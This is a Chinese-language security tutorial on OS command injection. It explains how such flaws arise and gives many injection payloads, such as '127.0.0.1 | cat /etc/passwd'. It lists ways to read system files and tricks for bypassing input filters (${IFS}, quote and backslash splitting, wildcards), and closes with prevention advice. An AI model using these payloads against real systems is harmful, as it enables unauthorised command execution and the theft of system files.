命令执行漏洞
1.命令执行漏洞概要
命令执行漏洞是指攻击者可以随意执行系统命令。它属于高危漏洞之一,也属于代码执行的范畴。命令执行漏洞不仅存在于B/S架构中,在C/S架构中也常常遇到
部分Web应用程序提供了一些命令执行的操作,例如,如果想测试http://www.test.com 是否可以正常连接,那么web应用程序底层就很可能去调用系统操作命令,如果此处没有过滤好用户输入的数据,就很有可能形成系统命令执行漏洞,如:ping 127.0.0.1 | whoami
2.连接符
|、 ||、&、&&、;
3.输出方式
cat:输出文件内容,如127.0.0.1 | cat /etc/passwd
tac:倒序输出
head:输出前几行
tail:输出后几行
grep:输出包含某一字符的行,如,grep '' /etc/passwd或grep . /etc/passwd(实际上这个点为正则表达式匹配)
例:127.0.0.1 | grep 'proxy' /etc/passwd
awk:awk {print} /etc/passwd
sed:sed '' /etc/passwd(同grep)
diff:对比两个文件,并输出他们的区别,diff /etc/passwd /etc/hostname
例:小于号是左边文件的内容,大于号是右边文件内容
less:less /etc/passwd
more:more /etc/passwd
od:二进制输出,od /etc/passwd
加上-a可以解码
xxd:xxd /etc/passwd
base64:可以对一个文件进行base64编码再输出
例:
再将其解码即可看到文件内容
curl:curl file:///etc/passwd(curl属于第三方软件包,不是所有Linux发行版都有)
cp:cp /etc/passwd /dev/stdout
nl:按行号输出,nl /etc/passwd
sort:排序输出,sort /etc/passwd
uniq:uniq /etc/passwd
4.过滤绕过
空格过滤
①重定向符
cat</etc/passwd
cat<>/etc/passwd
②内部字段分隔符
cat${IFS}/etc/passwd
cat$IFS$9/etc/passwd
③变量绕过(bash中才可用)
f=$'\20/etc/passwd'&&cat$f 定义变量f,f就是空格/etc/passwd
替换为空
双写:cacatt /etc/passwd
关键字过滤
①反斜杠分割
c\at /etc/passwd
②空字符串分割
ca''t /etc/passwd
文件名过滤
如,检测输入是否存在passwd
通配符
cat /etc/pa*:输出/etc下所有pa开头的文件
例:
5.漏洞防范
①尽量不要使用命令执行函数
②在进入执行命令函数/方法之前,变量一定要做好过滤,对敏感字符转义
③ 在使用动态函数之前,确保使用的函数是指定的函数之一
④ 客户端提交的变量在进入执行命令函数前要做好过滤和检测
总结:对PHP语言来说,不能完全控制的危险函数最好不要使用
调用系统命令,本身就是非常危险的动作,开发过程中应尽量避免,实在无法
避免,应该进行严格过滤,白名单要比黑名单好点。尽量使用静态,例如需要
测试网络连通性,应内置一个ip地址,而不是让用户自行输入